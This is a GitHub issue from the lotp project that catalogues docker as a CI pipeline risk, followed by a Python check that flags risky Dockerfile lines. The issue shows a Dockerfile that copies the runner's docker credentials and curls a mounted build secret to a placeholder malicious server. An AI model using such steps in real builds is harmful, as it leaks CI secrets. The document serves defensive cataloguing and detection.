boostsecurityio / lotp

Apache License 2.0

[LOTP] Add docker #35

Open fproulx-boostsecurity opened 2 months ago

fproulx-boostsecurity commented 2 months ago

Description of the LOTP tool

docker is a tool to build / inspect OCI images and run containers. The build stage can be configured with a Dockerfile.

Configuration files

Dockerfile

Exfiltration scenario

In the case where build-time secrets are exposed to docker build, a maliciously crafted Dockerfile could allow exfiltration of the secrets.

FROM ubuntu:latest

ADD /home/runner/.docker/config.json config.json
RUN ...

RUN --mount=type=secret,id=mysecret \
    sh -c 'curl -X POST -d "@/run/secrets/mysecret" http://malicious-server.example.com'
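As an added example (not code from the lotp project or the issue author), a small pre-build check that flags the two patterns in the Dockerfile above: an ADD/COPY whose source path points outside the build context, and a RUN step that mounts a secret while invoking a network tool. The sample Dockerfile and the tool list are constructed for illustration.

```python
import re

# Constructed sample modelled on the Dockerfile quoted in the issue.
SAMPLE_DOCKERFILE = """\
FROM ubuntu:latest

ADD /home/runner/.docker/config.json config.json
RUN apt-get update

RUN --mount=type=secret,id=mysecret \\
    sh -c 'curl -X POST -d "@/run/secrets/mysecret" http://malicious-server.example.com'
"""

# Assumed, non-exhaustive list of tools that can move data off the build host.
NETWORK_TOOLS = re.compile(r"\b(curl|wget|nc|ncat|socat|ssh|scp)\b")


def join_continuations(text: str) -> list[str]:
    """Merge backslash-continued lines so each instruction is one logical line."""
    logical, buf = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.endswith("\\"):
            buf += line[:-1].rstrip() + " "   # continuation: keep accumulating
            continue
        buf += line
        if buf.strip():
            logical.append(buf.strip())
        buf = ""
    if buf.strip():                           # file ended on a continuation
        logical.append(buf.strip())
    return logical


def find_secret_risks(dockerfile: str) -> list[tuple[int, str]]:
    """Return (logical instruction number, reason) for lines a reviewer should look at."""
    findings = []
    for n, line in enumerate(join_continuations(dockerfile), start=1):
        parts = line.split(None, 1)
        instr = parts[0].upper()
        args = parts[1] if len(parts) > 1 else ""
        if instr in ("ADD", "COPY"):
            srcs = [t for t in args.split() if not t.startswith("--")]  # skip --chown etc.
            if srcs and (srcs[0].startswith("/") or srcs[0].startswith("../")):
                findings.append((n, "copies a path outside the build context"))
        if instr == "RUN" and "--mount=type=secret" in args and NETWORK_TOOLS.search(args):
            findings.append((n, "secret mounted into a step that runs a network tool"))
    return findings
```

Running it over a CI job's Dockerfile before `docker build` gives a cheap gate; the hits still need human review, since legitimate steps such as a package install can also use curl.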